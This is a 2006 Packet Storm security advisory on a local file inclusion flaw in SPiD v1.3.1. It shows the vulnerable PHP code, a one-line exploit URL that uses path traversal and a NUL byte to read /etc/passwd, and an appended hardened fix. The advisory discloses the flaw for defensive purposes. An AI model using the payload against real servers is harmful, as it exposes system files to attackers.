NSAG-201-25.02.2006.txt

2006-02-26T00:00:00
ID PACKETSTORM:44199
Type packetstorm
Reporter nsag.ru
Modified 2006-02-26T00:00:00

Description

                                        
                                            `Advisory:  
NSAG-¹201-25.02.2006  
  
Research:  
NSA Group [Russian company for security auditing & network security]  
  
Site of Research:  
http://www.nsag.ru or http://www.nsag.org  
  
Product:  
SPiD v1.3.1  
  
  
Site of manufacturer:  
http://spid.adnx.net/  
  
Status:   
19/01/2006 - Publication postponed.  
14/02/2006 - No answer from the manufacturer.  
25/02/2006 - Vulnerability published.  
  
Original Advisory:  
http://www.nsag.ru/vuln/955.html  
  
Risk:   
High  
  
Description:   
An attacker can craft the "lang" parameter in the URL and gain read access to  
system files through the unfiltered include.  
  
Vulnerability code:  
+++++++  
if (isset($_REQUEST["lang"])) {  
    // $_REQUEST["lang"] is concatenated into the path unfiltered:  
    // "../" traversal and a trailing %00 (NUL) byte both pass through  
    $file_lang = $lang_path . "lang_" . $_REQUEST["lang"] . ".php";  
    if (file_exists($file_lang)) {  
        include $lang_path . "lang.php";  
        include $file_lang;  
        .....  
        skip  
    }  
}  
+++++++  
  
Exploit:   
http://example.com/spiddir/scan_lang_insert.php?lang=../../../../../../../../etc/passwd%00  
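For comparison, the following is an added example of a hardened replacement for the language include; it is not SPiD's code and not part of the original advisory. It keeps the advisory's names ($lang_path, the "lang" request parameter, the lang_*.php naming) and assumes a lang/ directory next to the script; the function name load_language is hypothetical. Note that file_exists() alone is not a defence: on PHP releases before 5.3.4 filesystem functions truncated paths at a NUL byte, so the %00 in the exploit URL made "lang_../../etc/passwd\0.php" resolve to /etc/passwd and pass the check.

```php
<?php
// Added example (not SPiD's code): allowlist the language code first,
// then confirm the resolved file still lives inside the language directory.

function load_language(string $lang_path, array $request): ?string
{
    // Default when the parameter is absent; reject arrays (?lang[]=x).
    $lang = $request['lang'] ?? 'en';
    if (!is_string($lang)) {
        return null;
    }

    // 1. Allowlist the shape of the value: "en" or "pt_BR" style codes only.
    //    This rejects "../", NUL bytes and anything else that is not a code.
    //    \z rather than $ so a trailing newline cannot slip past the anchor.
    if (!preg_match('/^[a-z]{2}(_[A-Z]{2})?\z/', $lang)) {
        return null;
    }

    // 2. Defence in depth: resolve both paths and require the candidate
    //    file to be under the language directory before including it.
    $base = realpath($lang_path);
    $file = realpath($lang_path . DIRECTORY_SEPARATOR . 'lang_' . $lang . '.php');
    if ($base === false || $file === false
        || strncmp($file, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }

    include $lang_path . DIRECTORY_SEPARATOR . 'lang.php';
    include $file;
    return $file;
}

// Usage in the page that previously performed the unchecked include.
// Assumption for this example: language files live in ./lang/ next to the script.
$lang_path = __DIR__ . DIRECTORY_SEPARATOR . 'lang';
$loaded = load_language($lang_path, $_REQUEST);
if ($loaded === null) {
    http_response_code(400);
    exit('invalid language');
}
```

With this in place the exploit URL above fails at the allowlist check (the value contains "/" and a NUL byte), and even a value that somehow passed would be rejected by the realpath comparison unless the file is genuinely inside $lang_path.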
  
More information:  
http://www.nsag.ru/vuln/955.html  
  
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++  
  
  
www.nsag.ru   
«Nemesis» © 2006   
------------------------------------   
Nemesis Security Audit Group © 2006.  
  
  